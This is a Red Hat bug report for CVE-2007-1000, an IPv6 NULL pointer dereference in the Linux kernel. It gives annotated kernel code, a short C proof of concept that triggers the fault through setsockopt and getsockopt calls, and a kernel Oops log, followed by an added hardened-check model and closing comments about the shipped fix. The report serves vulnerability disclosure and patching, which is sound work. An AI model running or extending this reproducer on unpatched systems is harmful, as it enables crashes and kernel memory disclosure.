Bug 232257 - CVE-2007-1000 NULL pointer hole in ipv6
Summary: CVE-2007-1000 NULL pointer hole in ipv6
Keywords:
Status: CLOSED ERRATA
Alias: None
Product: Red Hat Enterprise Linux 5
Classification: Red Hat
Component: kernel
Version: 5.0
Hardware: All
OS: Linux
Priority: medium
Severity: high
Target Milestone: ---
Assignee: Don Howard
QA Contact: Martin Jenner
URL:
Whiteboard: impact=important,source=vendorsec,rep...
Depends On:
Blocks:
Reported: 2007-03-14 16:04 UTC by Marcel Holtmann
Modified: 2007-11-30 22:07 UTC (History)

Fixed In Version: RHSA-2007-0169
Doc Type: Bug Fix
Doc Text:
Clone Of:
Environment:
Last Closed: 2007-04-30 16:38:01 UTC




Links
System: Red Hat Product Errata
ID: RHSA-2007:0169
Priority: normal
Status: SHIPPED_LIVE
Summary: Important: kernel security and bug fix update
Last Updated: 2007-04-30 16:36:50 UTC

Description Marcel Holtmann 2007-03-14 16:04:06 UTC
There is a NULL pointer dereference which can lead to an arbitrary kernel memory
leak, in the file net/ipv6/ipv6_sockglue.c:

	case IPV6_2292PKTOPTIONS:
	{
		struct ipv6_txoptions *opt = NULL;                        [1]
		struct msghdr msg;
		struct flowi fl;
		int junk;

		fl.fl6_flowlabel = 0;
		fl.oif = sk->sk_bound_dev_if;

		if (optlen == 0)
			goto update;                                      [2]
...
update:
		retv = 0;
		if (inet_sk(sk)->is_icsk) {
			if (opt) {
...
			}
			opt = xchg(&np->opt, opt);                        [3]
			sk_dst_reset(sk);
		} else {
			write_lock(&sk->sk_dst_lock);
			opt = xchg(&np->opt, opt);                        [4]
			write_unlock(&sk->sk_dst_lock);
			sk_dst_reset(sk);
		}
...
	case IPV6_DSTOPTS:
		{
			lock_sock(sk);
			len = ipv6_getsockopt_sticky(sk, np->opt->hopopt, [5]
						     optval, len);
			release_sock(sk);
			return put_user(len, optlen);
		}

In the function do_ipv6_setsockopt(), if optname = IPV6_2292PKTOPTIONS and
optlen = 0 [2], np->opt is set to NULL [3][4].
In the function do_ipv6_getsockopt(), if optname = IPV6_DSTOPTS, np->opt is
dereferenced [5].

An attacker can read any portion of the kernel memory: ipv6_getsockopt_sticky()
copies np->opt->hopopt to optval, which is a user buffer, and np->opt can be
mmapped to NULL.

Here is a program that reproduces the bug:
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>

int main(int argc, char *argv[]) {
  int s;
  socklen_t optlen = 4;
  s = socket(AF_INET6, SOCK_STREAM, IPPROTO_TCP);
  /* optname 6 = IPV6_2292PKTOPTIONS with optlen 0: takes the goto at [2],
     so np->opt is exchanged for NULL at [3]/[4] */
  setsockopt(s, IPPROTO_IPV6, 6, (void *)NULL, 0);
  /* optname 59 = IPV6_DSTOPTS: np->opt->hopopt is dereferenced at [5] */
  getsockopt(s, IPPROTO_IPV6, 59, (void *)NULL, &optlen);
  return 0;
}

And the Oops output:
[17183522.904000] BUG: unable to handle kernel NULL pointer dereference at virtual address 00000008
[17183522.904000]  printing eip:
[17183522.904000] f8eba4d4
[17183522.904000] *pde = 00000000
[17183522.904000] Oops: 0000 [#1]
[17183522.904000] Modules linked in: nls_utf8 nls_cp437 vfat fat sg sd_mod usb_storage libusual binfmt_misc rfcomm hidp l2cap bluetooth fglrx speedstep_centrino cpufreq_userspace cpufreq_stats freq_table cpufreq_powersave cpufreq_ondemand cpufreq_conservative video tc1100_wmi sbs sony_acpi pcc_acpi i2c_ec i2c_core hotkey dev_acpi button battery container ac asus_acpi dm_mod md_mod sr_mod sbp2 scsi_mod parport_pc lp parport ipv6 8139cp pcmcia 8139too joydev ipw2200 mii ieee80211 ieee80211_crypt yenta_socket rsrc_nonstatic sdhci mmc_core tifm_7xx1 tifm_core tsdev pcmcia_core snd_intel8x0 snd_ac97_codec snd_ac97_bus snd_pcm_oss snd_mixer_oss snd_pcm snd_timer snd evdev intel_agp agpgart usbhid rtc soundcore snd_page_alloc shpchp pci_hotplug psmouse serio_raw ext3 jbd ohci1394 ieee1394 ehci_hcd uhci_hcd usbcore ide_generic ide_cd cdrom ide_disk piix generic thermal processor fan capability commoncap vesafb fbcon tileblit font bitblit softcursor
[17183522.904000] CPU:    0
[17183522.904000] EIP:    0060:[<f8eba4d4>]    Tainted: P      VLI
[17183522.904000] EFLAGS: 00210286   (2.6.17-11-386 #2)
[17183522.904000] EIP is at ipv6_getsockopt+0x4e4/0x6d0 [ipv6]
[17183522.904000] eax: 00000000   ebx: d33d1b00   ecx: d33d1f18   edx: d33d1f18
[17183522.904000] esi: 00000000   edi: 00000029   ebp: 0000003b   esp: dcd07d5c
[17183522.904000] ds: 007b   es: 007b   ss: 0068
[17183522.904000] Process poc (pid: 5968, threadinfo=dcd06000 task=dbbb5540)
[17183522.904000] Stack: 00000001 00000003 dfa794d8 00200286 d33d1f18 d2b8b3ec 00000004 00000006
[17183522.904000]        c025a68b 00200296 00000000 e15f2440 d2b8b3ec 00200282 d33d1b00 00000000
[17183522.904000]        d33d1b00 00000000 f8eba94b 00000000 00000000 dfed6000 f8c9a4ff 00000000
[17183522.904000] Call Trace:
[17183522.904000]  <c025a68b> lock_sock+0xab/0xc0  <f8eba94b> ipv6_setsockopt+0x16b/0xc40 [ipv6]
[17183522.904000]  <f8c92614> __ext3_journal_stop+0x24/0x50 [ext3]  <c0179c74> __mark_inode_dirty+0x34/0x170
[17183522.904000]  <c013c78b> do_generic_mapping_read+0x42b/0x540  <c0154f74> cache_alloc_refill+0x314/0x4d0
[17183522.904000]  <c0288da6> tcp_getsockopt+0x36/0x2b0  <c016f0b7> d_alloc+0x27/0x190
[17183522.904000]  <c016f059> d_instantiate+0x49/0x80  <f8eba7e0> ipv6_setsockopt+0x0/0xc40 [ipv6]
[17183522.904000]  <c0289966> tcp_setsockopt+0x36/0x370  <c0259de3> sock_common_getsockopt+0x23/0x30
[17183522.904000]  <c025872e> sys_getsockopt+0x8e/0xc0  <c0259a44> sys_socketcall+0x234/0x280
[17183522.904000]  <c02c7a00> do_page_fault+0x0/0x6e0  <c0102dbb> sysenter_past_esp+0x54/0x79
[17183522.904000] Code: ff 8b 4c 24 10 0f b6 41 45 c0 e8 02 83 e0 01 89 84 24 54 01 00 00 e9 ee fb ff ff 89 d8 31 f6 e8 13 01 3a c7 8b 54 24 10 8b 42 58 <8b> 50 08 85 d2 74 2c 0f b6 42 01 be f2 ff ff ff 8d 3c c5 08 00
[17183522.904000] EIP: [<f8eba4d4>] ipv6_getsockopt+0x4e4/0x6d0 [ipv6] SS:ESP 0068:dcd07d5c

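To make the missing check at [5] concrete, here is an added user-space model of the np->opt lifecycle the report walks through (example code written for this page, not the kernel's code and not the fix shipped in the erratum); the struct layouts and function names are simplified assumptions, and the option contents are constructed.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Simplified stand-ins for the kernel structures named in the report;
 * the field layouts here are assumptions, not the kernel's definitions. */
struct ipv6_opt_hdr { uint8_t nexthdr; uint8_t hdrlen; uint8_t data[6]; };
struct ipv6_txoptions { struct ipv6_opt_hdr *hopopt; };
struct ipv6_pinfo { struct ipv6_txoptions *opt; };

/* Length of an extension header on the wire: (hdrlen + 1) * 8 bytes. */
static size_t ipv6_optlen(const struct ipv6_opt_hdr *h) {
    return ((size_t)h->hdrlen + 1) * 8;
}

/* Shape of the call at [5]: the caller has already evaluated
 * np->opt->hopopt, so a NULL np->opt faults before this function runs. */
int sticky_copy_hdr(const struct ipv6_opt_hdr *hdr, char *buf, size_t buflen) {
    size_t len = ipv6_optlen(hdr);
    if (len > buflen) len = buflen;
    memcpy(buf, hdr, len);
    return (int)len;
}

/* Hardened shape: hand over the per-socket info and check the container
 * (and the option inside it) before any dereference happens. */
int sticky_copy_checked(const struct ipv6_pinfo *np, char *buf, size_t buflen) {
    if (np->opt == NULL || np->opt->hopopt == NULL)
        return 0;                 /* nothing set: report length 0 */
    return sticky_copy_hdr(np->opt->hopopt, buf, buflen);
}

/* The optlen == 0 path at [2]-[4]: np->opt is exchanged for NULL. */
void clear_pktoptions(struct ipv6_pinfo *np) { np->opt = NULL; }

/* Constructed scenario: one 8-byte hop-by-hop option (hdrlen = 0) is
 * installed, optionally cleared as setsockopt() does, then read back. */
int demo(int clear_first) {
    struct ipv6_opt_hdr hop = { 59, 0, { 1, 1, 0, 0, 0, 0 } };
    struct ipv6_txoptions txopt = { &hop };
    struct ipv6_pinfo np = { &txopt };
    char out[64];
    if (clear_first) clear_pktoptions(&np);
    return sticky_copy_checked(&np, out, sizeof out);
}
```

With the option still installed the read returns the 8-byte header; after the clear the checked path returns 0 instead of reaching through a NULL np->opt.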
Comment 3 Don Howard 2007-03-29 21:42:07 UTC
A patch for this issue has been included in zstream build 2.6.18-8.1.2.el5.

Comment 5 Mike Gahagan 2007-04-27 14:38:41 UTC
Verified with 2.6.18-8.1.3.el5.

Comment 7 Red Hat Bugzilla 2007-04-30 16:38:01 UTC
An advisory has been issued which should help the problem
described in this bug report. This report is therefore being
closed with a resolution of ERRATA. For more information
on the solution and/or where to find the updated files,
please follow the link below. You may reopen this bug report
if the solution does not work for you.

http://rhn.redhat.com/errata/RHSA-2007-0169.html


